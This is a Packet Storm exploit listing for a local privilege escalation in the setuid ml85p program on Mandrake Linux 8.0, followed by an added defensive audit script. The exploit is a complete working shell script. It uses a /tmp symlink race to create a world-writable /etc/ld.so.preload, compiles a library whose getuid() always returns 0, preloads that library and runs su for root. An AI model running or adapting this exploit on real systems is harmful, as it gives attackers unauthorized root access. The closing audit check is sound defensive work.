ml85p.sh

18 Jul 2001 00:00:00 | Reported by: Suid | Type: packetstorm | Source: packetstormsecurity.com

Exploit for local privilege escalation on Linux Mandrake 8.0 using ml85p and ld.so.preload.

Code
`Why code the exploit in C if you were just going to sprintf(); system()
everything anyway? This is a bad exploit for a lame bug. I found this in April
and wrote this exploit to muck around with /etc/ld.so.preload as a means of
elevating privileges from symlink attacks locally. Old news but still. This
ml85 bug appears in Linux Mandrake 8.0. Thing is, this program is mode 4750
root:sys so whatever...
  
suid  
  
----  
  
#!/bin/sh  
# Exploit using /usr/bin/ml85p default setuid program on   
# Mandrake Linux 8.0  
#  
# You need to be in the sys group to be able to execute   
# ml85p.  
  
echo "** ml85p exploit"  
# set the required umask  
umask 0  
  
# get the number of seconds since 1970  
DATE=`date +"%s"`  
if [ ! -u /usr/bin/ml85p ] || [ ! -x /usr/bin/ml85p ]  
then  
echo "** this exploit requires that /usr/bin/ml85p is setuid and executable."
exit 1  
fi  
  
if [ ! -e /etc/ld.so.preload ] || [ ! -w /etc/ld.so.preload ]  
then  
echo "** this exploit requires that /etc/ld.so.preload does not exist."  
exit 1  
fi  
  
echo "** creating file"  
ln -s /etc/ld.so.preload /tmp/ml85g"$DATE"  
echo "bleh" | /usr/bin/ml85p -s  
rm /tmp/ml85g"$DATE"  
  
echo "** creating shared library"  
cat << _EOF_ > /tmp/g.c  
int getuid(void) { return(0); }  
_EOF_  
  
echo "** compiling and linking shared object"  
gcc -c -o /tmp/g.o /tmp/g.c  
ld -shared -o /tmp/g.so /tmp/g.o  
rm -f /tmp/g.c /tmp/g.o  
  
echo "** rigging ld.so.preload"  
echo "/tmp/g.so" > /etc/ld.so.preload  
echo "** execute su. warning all getuid() calls will return(0) until you remove"  
echo "** the line \"/tmp/g.so\" from /etc/ld.so.preload. removing /tmp/g.so without"
echo "** first fixing /etc/ld.so.preload may result in system malfunction"  
su -  
echo "** cleaning up"  
> /etc/ld.so.preload  
rm -f /tmp/g.so  
`
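
The script above leaves /etc/ld.so.preload world-writable (it is created under umask 0) and pointing at a library in /tmp. The following audit check for that state is an added example, not part of the original post; the function names, finding labels and fixture paths are hypothetical and constructed for illustration.

```sh
#!/bin/sh
# Added defensive example; function names and finding labels are hypothetical.

# True when the mode string shows group- or world-write permission.
loose_mode() {
    case "$(ls -ldL "$1" 2>/dev/null | cut -c1-10)" in
        ?????w????|????????w?) return 0 ;;
    esac
    return 1
}

# audit_preload [FILE]: print one finding per line, nothing when clean.
audit_preload() {
    f=${1:-/etc/ld.so.preload}
    [ -e "$f" ] || return 0
    [ -L "$f" ] && echo "SYMLINK $f"
    loose_mode "$f" && echo "WRITABLE_FILE $f"
    # Drop '#' comments, then split entries on whitespace and colons.
    sed 's/#.*//' "$f" | tr ': \t' '\n\n\n' |
    while read -r lib || [ -n "$lib" ]; do
        [ -n "$lib" ] || continue
        if [ ! -e "$lib" ]; then
            echo "MISSING $lib"
        elif loose_mode "$lib" || loose_mode "$(dirname "$lib")"; then
            # Library, or the directory holding it, can be replaced by non-root users.
            echo "WRITABLE_LIB $lib"
        fi
    done
    return 0
}

# Constructed fixture: a mode-0666 preload file naming a library that sits
# in a sticky world-writable directory, mirroring the state described above.
demo_audit() {
    d=$(mktemp -d) || return 1
    mkdir "$d/tmp" && chmod 1777 "$d/tmp"
    : > "$d/tmp/g.so"
    chmod 644 "$d/tmp/g.so"
    printf '%s\n' "$d/tmp/g.so  # constructed entry" > "$d/ld.so.preload"
    chmod 666 "$d/ld.so.preload"
    audit_preload "$d/ld.so.preload" | sed "s|$d|<fixture>|"
    rm -rf "$d"
}

demo_audit
```

Run without arguments, `audit_preload` checks the real /etc/ld.so.preload; any output on a host that does not deliberately use a preload file warrants investigation.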

Vulners AI Score: 7.4 (High risk)